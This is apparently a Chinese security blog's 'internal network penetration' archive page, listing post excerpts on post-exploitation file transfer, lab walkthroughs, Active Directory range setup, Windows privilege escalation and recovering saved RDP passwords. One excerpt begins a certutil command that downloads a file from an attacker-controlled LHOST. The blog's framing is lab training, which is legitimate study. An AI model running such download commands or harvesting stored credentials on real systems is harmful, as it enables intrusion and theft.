banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

内网渗透

cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

后渗透之文件传输及下载

拿到了服务器之后,就需要上传工具,或者从服务器下载文件,针对不同的场景(网络环境)可能需要用到不同的文件下载工具,平常打靶场也能用得到,这里就简单记录下。 windows Copy certutil -urlcache -split -f "http://<LHOST…
工具
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

春秋云镜靶场--Certify记录

Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
渗透测试
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

ATT&CK红队评估实战靶场-1

靶场来自:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 简单的一个靶场,本来用作学生的考核的,但是没用到,横向的域渗透也只是用了 cobalt strike 上的 psexec 模块,主要的内容是熟悉一些渗透的流程。 靶场有…
靶场
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

game of active directory(GOAD)域环境搭建

Game Of Active directory的第二个版本,项目地址:https://github.com/Orange-Cyberdefense/GOAD 域靶场环境通过 vagrang 安装 5 个 windows 实例(三个 DC,两个普通域内主机),拓朴图如下: 官…
渗透测试
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

lpeworkshop提权实验 - windows

实验环境项目地址: https://github.com/sagishahar-zz/lpeworkshop windows 实验的前提,需要先自己准备一个 Windows 7 (SP1) x64 Build 7601 的英文操作系统,原作者所有的实验都基于此操作系统。 1…
内网渗透
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

内网渗透基础

内网 内网指的是内部局域网,常说的 LAN(local area network)。常见家庭 wifi 网络和小型的企业网络,通常内部计算机直接访问路由器设备,路由器设备接入移动电信的光纤实现上网。 内部局域网可以通过交换机 / 防火墙组成多个网络(局域…
渗透测试
cover
cover
cover
cover

内网渗透之获取windows远程桌面(RDP)连接记录密码

利用条件:就是mstsc连接的时候,管理员勾选了自动保存密码连接的选项。
内网渗透
Ownership of this blog data is guaranteed by blockchain and smart contracts to the creator alone.